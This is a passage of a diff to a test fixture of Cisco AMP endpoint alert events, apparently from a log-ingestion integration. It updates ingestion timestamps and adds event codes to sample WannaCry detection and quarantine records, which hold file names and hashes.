pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419303574240494000",
@@ -1456,8 +1474,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420951151Z",
+                "ingested": "2021-09-30T00:14:44.025245294Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526287\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419303574240494000",
@@ -1531,8 +1550,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420952916Z",
+                "ingested": "2021-09-30T00:14:44.025247539Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526286\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419303574240494000",
@@ -1606,8 +1626,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420954673Z",
+                "ingested": "2021-09-30T00:14:44.025249744Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558988\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419303574240494000",
@@ -1681,8 +1702,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420956427Z",
+                "ingested": "2021-09-30T00:14:44.025251965Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558989\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419303574240494000",
@@ -1756,8 +1778,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420958165Z",
+                "ingested": "2021-09-30T00:14:44.025254167Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558987\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419303574240494000",
@@ -1831,8 +1854,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420960037Z",
+                "ingested": "2021-09-30T00:14:44.025256572Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558986\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419303574240494000",
@@ -1906,8 +1930,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420961785Z",
+                "ingested": "2021-09-30T00:14:44.025258876Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558985\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419303574240494000",
@@ -1981,8 +2006,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420963550Z",
+                "ingested": "2021-09-30T00:14:44.025261148Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419303574240494000",
@@ -2075,8 +2101,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420965302Z",
+                "ingested": "2021-09-30T00:14:44.025263398Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":461000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419303574240494000",
@@ -2171,8 +2198,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420967064Z",
+                "ingested": "2021-09-30T00:14:44.025265613Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":430000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419303574240494000",
@@ -2271,8 +2299,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420968812Z",
+                "ingested": "2021-09-30T00:14:44.025267991Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":327000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419303574240494000",
@@ -2371,8 +2400,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420970563Z",
+                "ingested": "2021-09-30T00:14:44.025270272Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":313000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419303574240494000",
@@ -2448,8 +2478,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420972303Z",
+                "ingested": "2021-09-30T00:14:44.025272669Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6419303574240494000",
@@ -2519,8 +2550,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420974035Z",
+                "ingested": "2021-09-30T00:14:44.025274907Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6419303574240494000",
@@ -2590,8 +2622,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420975788Z",
+                "ingested": "2021-09-30T00:14:44.025277130Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6419303574240494000",
@@ -2661,8 +2694,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420977517Z",
+                "ingested": "2021-09-30T00:14:44.025279336Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}",
